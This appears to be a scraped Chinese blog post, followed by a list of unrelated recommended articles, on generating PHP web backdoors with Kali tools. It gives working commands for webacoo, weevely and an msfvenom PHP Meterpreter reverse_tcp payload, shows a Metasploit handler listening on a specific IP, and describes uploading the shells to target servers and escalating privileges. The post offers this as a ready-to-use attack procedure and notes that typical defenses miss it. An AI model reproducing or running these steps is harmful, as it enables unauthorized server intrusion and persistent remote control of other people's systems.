很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。

Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:

1.webacoo后门

webacoo  -g -o test.php

-g 制作后门代码

-o 输出生成指定的后门程序文件名

把web后门上传到目标服务器后

使用kali linux访问如下

webacoo -t -u http://www.xx.com/test.php

注意:上传的路径一定要正确

最后退出的时候使用exit退出

2.weevely

查看帮助信息

生成后门

下列命令可以生产混搅PHP backdoor , 密码password 后门名字disaplay.php

weevely generate password disaplay.php

把后门文件上传到服务器后,如下命令可以成功访问

weevely http://www.xxx.com/disaplay.php password

通过help看到weevely有很多的module

.net.ifaces 查看服务器的端口信息

.net.scan 202.205.xx.xx 22   对服务器某个端口扫描

3.PHP Meterpreter

metasploit有一个名为PHP Meterpreter的payload,可创建具有meterpreter功能的PHP webshell。

Metasploit的msfvenom工具可以制作PHP Meterpreter,命令如下:

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=自己监听的IP -f raw > php_meter.php

-p 设置payload

-f 设置输出文件格式

但是使用前需要注意生成文件的第一行被注释了,所以需要把注释去掉才能使用

把webshell上传到目标服务器,本地监听打开如下:

启动msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 202.205.7.162

然后我们就可以使用kali的metasploit功能对目标服务器进行一系列操作。

这种WEBSHELL 利用起来相当方便,输入shell命令之后,就可以随便提权什么的了.
1,国内的貌似没有防护这块的,国内大多只防护GET POST COOKIE这些数据.
2,缺点是如果服务器在DMZ,则失效.
3,more what .....   这种shell如果被利用多了,肯定会有硬件厂商去做防护的.

kali下生成web端后门相关推荐

  1. Kali下的Web漏洞扫描工具汇总:OpenVAS、nessus、acunetix、w3af等

    OpenVAS 更新kali apt-get update apt-get dist-upgrade 安装OpenVAS,这一步需要的时间非常久,需要下载很多文件,建议使用screen操作,避免she ...

  2. kali 创建php可执行文件_利用树莓派在kali环境下搭建Web环境(Apache+Php7.3+Mysql)...

    前言 在kali下我们来搭建web系统环境,在平时我们可在win系列的系统上用Phpstudys等集成环境来搭建,快捷 方便.今天来看看如何在kali下搭建环境.此中安装方法也适应Debian系列的系 ...

  3. 前端工程化-基于Taro的Web端Monorepo架构改造

    前端工程化-Genebox小程序端Monorepo架构改造中介绍了在使用Taro框架下,结合yarn workspace + lerna 来改造Monorepo架构的方式和流程,这篇文章与本篇文章内容 ...

  4. [Axis2与Eclipse整合开发Web Service系列之二] Top-Down方式,通过WSDL逆向生成服务端(续)

    前言 本篇是承接上一篇: [Axis2与Eclipse整合开发Web Service系列之二] Top-Down方式,通过WSDL逆向生成服务端 在上一篇粗略地介绍了如何使用Top-Down的方式创建 ...

  5. [Axis2与Eclipse整合开发Web Service系列之二] Top-Down方式,通过WSDL逆向生成服务端

    开始本篇之前, 先说说 Buttom-up(从下到上)和Top-down(从上到下)的概念 这是开发WebService的两种方式. bottom-up 方式: 先创建Java Bean或EJB, 然 ...

  6. springboot2整合二维码 生成二维码图片及输出web端及打印

    step1 导包 <!-- 二维码 --><dependency><groupId>com.google.zxing</groupId><arti ...

  7. [图解教程]Axis2与Eclipse整合开发Web Service之二:WSDL逆向生成服务端

    [图解教程]Axis2与Eclipse整合开发Web Service之二:WSDL逆向生成服务端 一般开发Web Service,是选写服务端,再根据生成的WSDL文件生成客户端.看过一本SOA的书中 ...

  8. WSDL文件生成WEB service server端C#程序

    一般一个已经实现功能的WEB Server会发布自己的WSDL文件,供客户端生成代理类. 但有时是先有的server与client交互的接口定义(WSDL)文件,然后由server和client端分别 ...

  9. web端权限维持【好文】

    前言 关于权限维持,我之前写过一篇基于系统端的后门技术文章,如映像劫持啊,lpk之类. 内容目录: - 构造文件包含漏洞 - 隐蔽性脚本木马 - 构造sql注入点 正文 0x01 构造文件包含漏洞 & ...

最新文章

  1. 通过游戏来学习CSS的Flex布局
  2. 安装java打开.jar文件
  3. 许昌网络企业网站建设的10个理由
  4. java设计模式face_24种设计模式--门面模式【Facede Pattern】
  5. 每个女孩子起床后做的第一件事......
  6. mysql如何优化性能优化_如何优化性能?MySQL实现批量插入以优化性能的实例详解...
  7. 【ES】ES 如何在一个机器上同时模拟多个node
  8. iOS优化内存,提升性能 之五
  9. [USACO13FEB]Milk Scheduling【拓扑序】
  10. java filter重定向_Java Filter(过滤器)——重定向
  11. android u盘检测工具,android 检测是否插入U盘方法之一
  12. 精益生产理论学习总结(一)
  13. 数字贸易标准体系框架
  14. python 实现 n 次方_python实现pow函数(求n次幂,求n次方)
  15. LVS_DR+keepalived(内涵理论与实验)
  16. 安装Windows Outlook邮箱客户端
  17. 语音科学计算机,CalcVoice(语音科学计算器)
  18. 1 - 基于卡方检验的特征选择
  19. python整数除法保留两位小数
  20. 2019.6.14 巴塞尔问题

热门文章

  1. hadoop学习3 查找块的位置
  2. 使用Puppeteer进行数据抓取(一)——安装和使用
  3. (十二)洞悉linux下的Netfilteramp;iptables:iptables命令行工具源码解析【下】
  4. C#中对泛型List进行分组输出元素
  5. Entity Framework系列之DataBase First
  6. 通过Ajax解析和jQuery写了一个小小的导航条
  7. [Vue warn]: You are using the runtime-only build of Vue 牵扯到Vue runtime-compiler与runtime-only区别
  8. 解决Button自动刷新页面的问题
  9. this.$router 的三种跳转页面方法
  10. 12月25号 Category类别